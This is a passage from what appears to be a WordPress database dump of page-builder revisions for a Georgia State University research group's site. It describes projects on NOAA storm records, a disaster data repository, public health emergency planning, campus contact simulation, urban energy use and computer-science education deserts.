gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n            <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n            <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n                      districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n                      demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n                      and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:16:59','2023-09-29 15:16:59','',126,'https://gsudice.dataconn.net/?p=1550',0,'revision','',0),(1556,1,'2023-09-29 11:17:45','2023-09-29 15:17:45','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:17:45','2023-09-29 15:17:45','',438,'https://gsudice.dataconn.net/?p=1556',0,'revision','',0),(1557,1,'2023-09-29 11:17:45','2023-09-29 15:17:45','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 